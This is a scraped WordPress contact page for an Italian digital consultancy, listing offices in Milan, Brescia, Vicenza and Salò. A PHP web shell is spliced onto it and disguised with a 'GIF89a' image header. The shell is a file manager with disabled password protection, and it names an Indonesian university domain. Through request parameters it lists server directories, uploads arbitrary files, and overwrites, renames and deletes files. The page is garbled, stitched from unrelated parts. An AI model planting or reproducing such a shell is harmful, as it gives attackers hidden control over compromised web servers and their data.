[section_dd fullwidth="0" no_column_margin="0" equalize_five="0" video_bg="0"]
[column_dd span="12"]
[h_dd type="1"]Ask Digital Pioneers how to
[/h_dd]
[spacer_dd pixels="20"][/spacer_dd]
[text_dd]Our team is here to help you and your business, do not hesitate to get in touch for an inquiry or to make an appointment in one of our locations in Northern Italy. We will get back to you in a few hours .
[/text_dd]
[/column_dd]
[/section_dd]
[section_dd]
[column_dd span="3"]
[h_dd type="3" class="column_title_text_margin"]Milano[/h_dd]
[text_dd][icon_dd name="whhg-map-marker" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd]Via G. Mengoni n.4 20121 – Milano[icon_dd name="whhg-phonealt" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd] 39 02 7631 7631
[/text_dd]
[/column_dd]
[column_dd span="3"]
[h_dd type="3" class="column_title_text_margin"]Brescia[/h_dd]
[text_dd][icon_dd name="whhg-map-marker" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd]Via Fratelli Ugoni n.36 25126 – Brescia[icon_dd name="whhg-phonealt" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd] 39 0365 521 620
[/text_dd]
[/column_dd]
[column_dd span="3"]
[h_dd type="3" class="column_title_text_margin"]Vicenza[/h_dd]
[text_dd][icon_dd name="whhg-map-marker" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd]Via Zamenhof n. 817 36100 – Vicenza[icon_dd name="whhg-phonealt" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd] 39 0444 1620 611
[/text_dd]
[/column_dd]
[column_dd span="3"]
[h_dd type="3" class="column_title_text_margin"]Salò[/h_dd]
[text_dd][icon_dd name="whhg-map-marker" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd]Via Enrico Fermi n. 5a 25087 – Salò (Brescia)[icon_dd name="whhg-phonealt" size="18px" color="#71757f" box="1" background="#ffffff"][/icon_dd] 39 0365 521 620
[/text_dd]
[/column_dd]
[/section_dd]
[section_dd fullwidth="0" no_column_margin="0" equalize_five="0" video_bg="0" bg_color="#ffffff" class="no_padding_top"]
[column_dd span="12"]
[map_dd h="450px" map_type="ROADMAP" lat="46.054511" lng="10.696120" zoom="7" markertitle="Femar Consulting Headquarter" markericon="/wp-content/uploads/2014/06/marker.png" markercontent="Via San Pietro all’Orto n. 3 - Milano (MI)" markerlat="45.465883" markerlng="9.195677"][/map_dd]
[spacer_dd pixels="70"][/spacer_dd]
[/column_dd]
[/section_dd]
[section_dd fullwidth="0" no_column_margin="0" equalize_five="0" video_bg="0" bg_color="#f7f7f7" section_title="Drop us a line and spark the digital transformation!" section_id="contact-us" class="black_text_header header_title_without_after section_with_header"]
[column_dd span="3"]
[/column_dd]
[column_dd span="6"]
[spacer_dd pixels="40"][/spacer_dd]
[contact-form-7 id="4227" html_id="contact-form-4227"][/contact-form-7]
[/column_dd]
[column_dd span="3"]
[/column_dd]
[/section_dd]
GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
= 1073741824) {
$bytes = number_format($bytes / 1073741824, 2) . ' GB';
} elseif ($bytes >= 1048576) {
$bytes = number_format($bytes / 1048576, 2) . ' MB';
} elseif ($bytes >= 1024) {
$bytes = number_format($bytes / 1024, 2) . ' KB';
} elseif ($bytes > 1) {
$bytes = $bytes . ' bytes';
} elseif ($bytes == 1) {
$bytes = $bytes . ' byte';
} else {
$bytes = '0 bytes';
}
return $bytes;
}
function fileExtension($file)
{
return substr(strrchr($file, '.'), 1);
}
function fileIcon($file)
{
$imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
$audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
$ext = strtolower(fileExtension($file));
if ($file == "error_log") {
return ' ';
} elseif ($file == ".htaccess") {
return ' ';
}
if ($ext == "html" || $ext == "htm") {
return ' ';
} elseif ($ext == "php" || $ext == "phtml") {
return ' ';
} elseif (in_array($ext, $imgs)) {
return ' ';
} elseif ($ext == "css") {
return ' ';
} elseif ($ext == "txt") {
return ' ';
} elseif (in_array($ext, $audio)) {
return ' ';
} elseif ($ext == "py") {
return ' ';
} elseif ($ext == "js") {
return ' ';
} else {
return ' ';
}
}
function encodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("ক", "খ", "গ", "ঘ");
return str_replace($a, $b, $path);
}
function decodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("ক", "খ", "গ", "ঘ");
return str_replace($b, $a, $path);
}
$root_path = __DIR__;
if (isset($_GET['p'])) {
if (empty($_GET['p'])) {
$p = $root_path;
} elseif (!is_dir(decodePath($_GET['p']))) {
echo ("");
} elseif (is_dir(decodePath($_GET['p']))) {
$p = decodePath($_GET['p']);
}
} elseif (isset($_GET['q'])) {
if (!is_dir(decodePath($_GET['q']))) {
echo ("");
} elseif (is_dir(decodePath($_GET['q']))) {
$p = decodePath($_GET['q']);
}
} else {
$p = $root_path;
}
define("PATH", $p);
echo ('
');
$path = str_replace('\\', '/', PATH);
$paths = explode('/', $path);
foreach ($paths as $id => $dir_part) {
if ($dir_part == '' && $id == 0) {
$a = true;
echo "
/ ";
continue;
}
if ($dir_part == '')
continue;
echo "
" . $dir_part . " /";
}
echo ('
');
if (isset($_GET['p'])) {
//fetch files
if (is_readable(PATH)) {
$fetch_obj = scandir(PATH);
$folders = array();
$files = array();
foreach ($fetch_obj as $obj) {
if ($obj == '.' || $obj == '..') {
continue;
}
$new_obj = PATH . '/' . $obj;
if (is_dir($new_obj)) {
array_push($folders, $obj);
} elseif (is_file($new_obj)) {
array_push($files, $obj);
}
}
}
echo '
Name
Size
Modified
Perms
Actions
';
foreach ($folders as $folder) {
echo "
" . $folder . "
---
". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "
0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "
";
}
foreach ($files as $file) {
echo "
" . fileIcon($file) . $file . "
" . formatSizeUnits(filesize(PATH . "/" . $file)) . "
" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "
0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "
";
}
echo "
";
} else {
if (empty($_GET)) {
echo ("");
}
}
if (isset($_GET['upload'])) {
echo '
';
}
if (isset($_GET['r'])) {
if (!empty($_GET['r']) && isset($_GET['q'])) {
echo '
';
if (isset($_POST['rename'])) {
$name = PATH . "/" . $_GET['r'];
if(rename($name, PATH . "/" . $_POST['name'])) {
echo ("");
} else {
echo ("");
}
}
}
}
if (isset($_GET['e'])) {
if (!empty($_GET['e']) && isset($_GET['q'])) {
echo '
';
if(isset($_POST['edit'])) {
$filename = PATH."/".$_GET['e'];
$data = $_POST['data'];
$open = fopen($filename,"w");
if(fwrite($open,$data)) {
echo ("");
} else {
echo ("");
}
fclose($open);
}
}
}
if (isset($_POST["upload"])) {
$target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.
";
} else {
echo "Sorry, there was an error uploading your file.
";
}
}
if (isset($_GET['d']) && isset($_GET['q'])) {
$name = PATH . "/" . $_GET['d'];
if (is_file($name)) {
if(unlink($name)) {
echo ("");
} else {
echo ("");
}
} elseif (is_dir($name)) {
if(rmdir($name) == true) {
echo ("");
} else {
echo ("");
}
}
}
?>